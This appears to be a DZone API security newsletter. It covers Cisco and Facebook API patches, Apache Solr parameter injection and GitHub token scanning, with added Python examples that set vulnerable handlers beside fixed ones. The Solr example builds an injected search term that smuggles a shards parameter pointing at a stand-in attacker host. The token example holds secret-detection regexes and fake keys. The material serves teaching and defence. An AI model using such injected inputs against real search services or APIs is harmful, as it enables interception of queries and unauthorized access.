
API Security Weekly: Issue #46

From Facebook and Cisco API patches to Solr parameter injection: your one-stop shop for all things API security.

By Dmitry Sotnikov · May. 26, 22 · Writers Zone · News


[Image: Facebook patching their APIs like]

This week, Cisco and Facebook have patched their APIs, a detailed report on Solr parameter injection is out, and GitHub continues its fight against API keys and tokens in public repositories.

You may also like: RESTful API Security.

Vulnerabilities: Cisco

Cisco has released patches for several critical API security flaws in its Cisco Unified Computing System (UCS) software and its Small Business 220 Series Smart Switches. The patches center on the APIs behind the web-based management interfaces.

With both UCS Director and UCS Director Express for Big Data, improper handling of authentication requests and insufficient validation of request headers could allow attackers either to bypass authentication completely or to log in with the SCP User account, which shipped with default credentials. From there, attackers could execute arbitrary commands or even obtain administrator access.

On the switch side, insufficient authorization checks could allow attackers to send malicious requests that modify the device configuration or inject a reverse shell. Another vulnerability could allow an unauthenticated attacker to trigger a buffer overflow and subsequently execute arbitrary code remotely.

This is yet another lesson in validating every incoming parameter, payload, and header, and in enforcing authorization on every management call rather than trusting the path by which a request arrived.

Vulnerabilities: Facebook

In a less sinister case, an authorization vulnerability (an insecure direct object reference, or IDOR) in a Facebook API allowed Philippe Harewood to disassociate the profile picture of any user from their profile.

The profile_picture_remove API call had a profile_id parameter that an attacker could substitute with the ID of any other Facebook user; the server never checked that the caller owned that profile.

Although the disassociated picture was not deleted from the account and the profile picture was simply replaced with Facebook's default one, this is still an authorization vulnerability, so Facebook fixed it and paid the researcher a bounty.
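The shape of that bug, as an added example that is not Facebook's code: a handler that trusts the client-supplied profile_id next to one that authorizes the object against the session. The in-memory store, the profile IDs and the function names are illustrative, and the probe function does what a tester would do, namely try to reset another user's picture.

```python
# Added example (not Facebook's code): the profile_picture_remove IDOR pattern,
# with the vulnerable handler next to an object-level-authorized one.
# The store, profile IDs and function names are illustrative.
from dataclasses import dataclass

DEFAULT_PICTURE = "default.png"


@dataclass
class Profile:
    owner_id: int
    picture: str


class Forbidden(Exception):
    """Raised when the acting user does not own the target object."""


def new_store() -> dict:
    """Constructed in-memory stand-in for the profile service (fresh per call)."""
    return {
        1001: Profile(owner_id=1001, picture="alice.jpg"),
        1002: Profile(owner_id=1002, picture="bob.jpg"),
    }


def remove_picture_vulnerable(store: dict, session_user_id: int, profile_id: int) -> str:
    """Vulnerable: looks up whatever profile_id the client sent and never
    compares it with the authenticated session, so any user can reset any
    profile's picture to the default."""
    profile = store[profile_id]
    profile.picture = DEFAULT_PICTURE
    return profile.picture


def remove_picture_fixed(store: dict, session_user_id: int, profile_id: int) -> str:
    """Fixed: authorize the target object against the session before mutating it."""
    profile = store[profile_id]
    if profile.owner_id != session_user_id:
        raise Forbidden(f"user {session_user_id} may not modify profile {profile_id}")
    profile.picture = DEFAULT_PICTURE
    return profile.picture


def cross_user_removal_allowed(handler) -> bool:
    """Probe a handler: does user 1002 manage to reset user 1001's picture?"""
    store = new_store()
    try:
        handler(store, session_user_id=1002, profile_id=1001)
    except Forbidden:
        pass
    return store[1001].picture == DEFAULT_PICTURE


if __name__ == "__main__":
    print("vulnerable handler lets 1002 reset 1001:",
          cross_user_removal_allowed(remove_picture_vulnerable))
    print("fixed handler lets 1002 reset 1001:",
          cross_user_removal_allowed(remove_picture_fixed))
```

The stronger fix is not to accept a profile_id for this operation at all: when an API call can only ever act on the caller's own object, derive the object from the session and drop the parameter, so there is nothing for an attacker to substitute.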

Vulnerabilities: Apache Solr Injection

Apache Solr is an open source enterprise search platform. The Solr API uses only the HTTP protocol and is available without any authentication by default, so anything that can reach it, including a web application that forwards user input into a Solr query, can drive it.

In his research, Michael Stepankin from Veracode explored how this turns into an exploitable vulnerability. He discusses:

  • Solr Parameters Injection (HTTP smuggling).
  • Solr Local Parameters Injection.
  • Remote code execution (RCE) through Apache Solr Injection.

All examples come with details and sample API calls.
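The first two items, as an added example that is neither Stepankin's code nor Apache Solr's: an application that concatenates a user's search term into the Solr request URL lets the term carry extra parameters (here a shards parameter pointing Solr at an attacker-chosen host), and a term beginning with {! is read by Solr as a local parameter even when it is correctly percent-encoded. The Solr host, collection name and the expected-parameter allow-list are assumptions.

```python
# Added example (not from Stepankin's research or Apache Solr): unencoded
# search terms become Solr parameter / local-parameter injection; the fixed
# builder keeps the term inside the q value and refuses local-parameter syntax.
# The Solr host, collection and parameter allow-list are assumed.
from urllib.parse import parse_qs, quote_plus, urlsplit

SOLR_SELECT = "http://solr.internal:8983/solr/products/select"
EXPECTED_PARAMS = {"q", "rows"}  # what this endpoint is meant to send


def build_query_vulnerable(user_term: str) -> str:
    """Raw concatenation: '&', '=' and '{!' in the term reach Solr verbatim."""
    return f"{SOLR_SELECT}?q={user_term}&rows=10"


def build_query_fixed(user_term: str) -> str:
    """Percent-encode the term so it cannot break out of the q value, and
    reject local-parameter syntax, which Solr interprets inside q itself."""
    if user_term.lstrip().startswith("{!"):
        raise ValueError("local parameter syntax is not allowed in search terms")
    return f"{SOLR_SELECT}?q={quote_plus(user_term)}&rows=10"


def solr_view(url: str) -> dict:
    """The parameter set Solr actually receives after splitting on '&'."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


def injected_params(url: str) -> set:
    """Parameters in the request that this endpoint never intended to send;
    usable as a request-time guard or as a check over proxy logs."""
    return set(solr_view(url)) - EXPECTED_PARAMS


if __name__ == "__main__":
    # Constructed attacker input: smuggles a shards parameter into the query
    # string so Solr fans the search out to a host the attacker controls.
    term = "laptop&shards=http://evil.example:8983/solr/x"
    print("vulnerable:", solr_view(build_query_vulnerable(term)))
    print("injected:", injected_params(build_query_vulnerable(term)))
    print("fixed:", solr_view(build_query_fixed(term)))
```

Encoding alone is not enough for the second class of bug: the local-parameter check matters because Solr parses {!...} from the decoded value of q, not from the query-string structure. Putting authentication in front of Solr, or at least restricting which request handlers and parameters the application tier may reach, is the defence the research's RCE chapter argues for.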

Tools: GitHub Token Scanning service

Leaked API keys remain one of the major sources of API breaches. Just like a username and password, an API key lets anyone who holds it invoke an external API on your behalf. For example, this is how credentials for Samsung's SmartThings service were recently exposed.

About a year ago, GitHub started its Token Scanning service, which identifies tokens shared in public repositories. The service only works with tokens from specific vendors, in formats known to it. Not only does the developer get notified, but GitHub also tells the corresponding partner about the leak so the token can be revoked.

The service initially launched with support for tokens from Alibaba Cloud, AWS, Azure, Google Cloud, Mailgun, npm, Slack, Stripe, and Twilio.

GitHub has just reported crossing the threshold of one billion potential tokens identified, and has added more partners: Atlassian, Dropbox, Discord, Proctorio, and Pulumi.

The one billion mark is staggering in itself and shows how widespread the issue is.
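Format-based token detection of the kind the service performs, as an added example that is not GitHub's scanner: a few simplified patterns (illustrative, not the partners' official ones) run over a constructed sample file whose values are all fake; the AWS pair is the example key AWS itself uses in its documentation.

```python
# Added example (not GitHub's scanner): format-based token detection of the
# kind the Token Scanning service performs, run over a constructed sample file.
# The regexes are simplified illustrations, not the partners' official patterns.
import re
from typing import List, NamedTuple

TOKEN_PATTERNS = {
    "AWS access key ID": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "Slack token": re.compile(r"\bxox[abpr]-[0-9A-Za-z-]{10,}\b"),
    "Stripe live secret key": re.compile(r"\bsk_live_[0-9a-zA-Z]{24,}\b"),
}


class Finding(NamedTuple):
    line: int
    kind: str
    redacted: str


def redact(token: str) -> str:
    """Keep enough to locate the token without re-leaking it in a report."""
    return f"{token[:4]}...{token[-4:]}"


def scan_text(text: str) -> List[Finding]:
    """Return one Finding per recognised token, in file order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in TOKEN_PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append(Finding(lineno, kind, redact(match.group(0))))
    return findings


# Constructed sample: every value is fake (the AWS pair is AWS's documented example).
SAMPLE_FILE = """\
# deploy.env
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
SLACK_BOT_TOKEN=xoxb-000000000000-000000000000-EXAMPLETOKENONLY
STRIPE_KEY=sk_live_EXAMPLEEXAMPLEEXAMPLE000
STRIPE_TEST_KEY=sk_test_EXAMPLEEXAMPLEEXAMPLE000
"""

if __name__ == "__main__":
    for finding in scan_text(SAMPLE_FILE):
        print(f"line {finding.line}: {finding.kind}: {finding.redacted}")
```

Note what the scan misses: the AWS secret access key on line 3 has no recognisable prefix and is not flagged. That is the limitation the service's "known formats" restriction implies, and it is why a pre-commit hook or CI job that combines vendor patterns with an entropy check is still worth running on your own repositories, public or not.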


Published at DZone with permission of Dmitry Sotnikov, DZone MVB. See the original article here.
